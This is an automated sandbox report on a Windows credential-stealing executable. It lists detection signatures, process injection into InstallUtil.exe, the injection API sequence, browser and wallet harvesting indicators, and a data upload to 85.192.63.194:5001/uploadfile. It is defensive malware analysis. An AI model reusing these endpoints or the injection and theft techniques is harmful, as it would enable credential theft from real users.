Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:874613
MD5:2df2884b8b1a86fa61343ea81352ec77
SHA1:83dc7863e234f48607a16f0be43290259088dfd2
SHA256:e0cc3040ad1009bda35882a71398733e14701fc0829e2d5dc84d920f6a72ec42
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Writes to foreign memory regions
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • file.exe (PID: 7040 cmdline: C:\Users\user\Desktop\file.exe MD5: 2DF2884B8B1A86FA61343EA81352EC77)
    • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • InstallUtil.exe (PID: 7152 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
    • 0x3a740:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
    • 0x3a7e4:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
    Process Memory Space: InstallUtil.exe PID: 7152JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: InstallUtil.exe PID: 7152INDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
      • 0x1d2e4:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: file.exeReversingLabs: Detection: 56%
      Source: file.exeVirustotal: Detection: 56%Perma Link
      Source: file.exeAvira: detected
      Source: http://85.192.63.194:5001/uploadfileVirustotal: Detection: 6%Perma Link
      Source: file.exeJoe Sandbox ML: detected
      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Users\admin\Desktop\worka\sourse\Obladet\obladaet\bin\Release\Secured\imageviewer.pdb source: file.exe, 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmp, InstallUtil.exe, 00000002.00000002.445600620.0000000000402000.00000040.00000400.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BE3A0 FindFirstFileExW,0_2_001BE3A0

      Networking

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 5001
      Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49708
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDNS query: name: ip-api.com
      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /uploadfile HTTP/1.1Content-Type: multipart/form-data; boundary="d93d91ad-9e20-4217-96c8-9bc98e4c52bc"Host: 85.192.63.194:5001Content-Length: 89557Expect: 100-continueConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
      Source: global trafficTCP traffic: 192.168.2.7:49706 -> 193.233.232.195:8899
      Source: global trafficTCP traffic: 192.168.2.7:49708 -> 85.192.63.194:5001
      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.195
      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.195
      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.195
      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.195
      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.195
      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.195
      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.195
      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.195
      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.195
      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.195
      Source: unknownTCP traffic detected without corresponding DNS query: 193.233.232.195
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: unknownTCP traffic detected without corresponding DNS query: 85.192.63.194
      Source: InstallUtil.exe, 00000002.00000002.449788785.00000000031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.192.63
      Source: InstallUtil.exe, 00000002.00000002.449788785.00000000031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.192.63.194:5001
      Source: InstallUtil.exe, 00000002.00000002.449788785.00000000031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.192.63.194:5001/uploadfile
      Source: InstallUtil.exe, 00000002.00000002.449788785.00000000031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.192.63.194:50014
      Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: file.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: file.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
      Source: file.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
      Source: file.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
      Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: file.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: file.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: InstallUtil.exe, 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
      Source: InstallUtil.exe, 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com4
      Source: file.exeString found in binary or memory: http://ocsp.digicert.com0
      Source: file.exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: file.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
      Source: file.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
      Source: file.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
      Source: InstallUtil.exe, 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: file.exeString found in binary or memory: http://subca.ocsp-certum.com01
      Source: file.exeString found in binary or memory: http://subca.ocsp-certum.com02
      Source: file.exeString found in binary or memory: http://subca.ocsp-certum.com05
      Source: file.exeString found in binary or memory: http://www.certum.pl/CPS0
      Source: file.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: tmp7F48.tmp.dat.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: tmp7F48.tmp.dat.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: tmp7F48.tmp.dat.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: InstallUtil.exe, 00000002.00000003.351802617.000000000102D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.459244638.0000000003D66000.00000004.00000800.00020000.00000000.sdmp, tmp7F48.tmp.dat.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: tmp7F48.tmp.dat.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: InstallUtil.exe, 00000002.00000003.351802617.000000000102D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.459244638.0000000003D66000.00000004.00000800.00020000.00000000.sdmp, tmp7F48.tmp.dat.2.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
      Source: InstallUtil.exe, 00000002.00000003.351802617.000000000102D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.459244638.0000000003D66000.00000004.00000800.00020000.00000000.sdmp, tmp7F48.tmp.dat.2.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
      Source: InstallUtil.exe, 00000002.00000003.351802617.000000000102D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.459244638.0000000003D66000.00000004.00000800.00020000.00000000.sdmp, tmp7F48.tmp.dat.2.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
      Source: InstallUtil.exe, 00000002.00000003.351802617.000000000102D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.459244638.0000000003D66000.00000004.00000800.00020000.00000000.sdmp, tmp7F48.tmp.dat.2.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
      Source: InstallUtil.exe, 00000002.00000003.351802617.000000000102D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.459244638.0000000003D66000.00000004.00000800.00020000.00000000.sdmp, tmp7F48.tmp.dat.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: unknownHTTP traffic detected: POST /uploadfile HTTP/1.1Content-Type: multipart/form-data; boundary="d93d91ad-9e20-4217-96c8-9bc98e4c52bc"Host: 85.192.63.194:5001Content-Length: 89557Expect: 100-continueConnection: Keep-Alive
      Source: unknownDNS traffic detected: queries for: ip-api.com
      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comConnection: Keep-Alive
      Source: file.exe, 00000000.00000002.348069137.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      System Summary

      barindex
      Source: 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
      Source: Process Memory Space: InstallUtil.exe PID: 7152, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000002.00000002.449788785.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
      Source: Process Memory Space: InstallUtil.exe PID: 7152, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B80B50_2_001B80B5
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001AF1920_2_001AF192
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C0A050_2_001C0A05
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A22000_2_001A2200
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C226A0_2_001C226A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B66380_2_001B6638
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001BC6C90_2_001BC6C9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B26E00_2_001B26E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02AB86282_2_02AB8628
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_02AB86182_2_02AB8618
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05522B182_2_05522B18
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05A1F1302_2_05A1F130
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05A113202_2_05A11320
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05A1FAA02_2_05A1FAA0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05A113102_2_05A11310
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05A1ED982_2_05A1ED98
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05A18E282_2_05A18E28
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05A18E1A2_2_05A18E1A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: String function: 02AB0570 appears 54 times
      Source: C:\Users\user\Desktop\file.exeCode function: String function: 001AA2B0 appears 51 times
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A2660 GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,GetConsoleWindow,ShowWindow,CreateProcessW,VirtualAllocEx,GetThreadContext,ReadProcessMemory,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,ResumeThread,0_2_001A2660
      Source: file.exeStatic PE information: invalid certificate
      Source: file.exeReversingLabs: Detection: 56%
      Source: file.exeVirustotal: Detection: 56%
      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
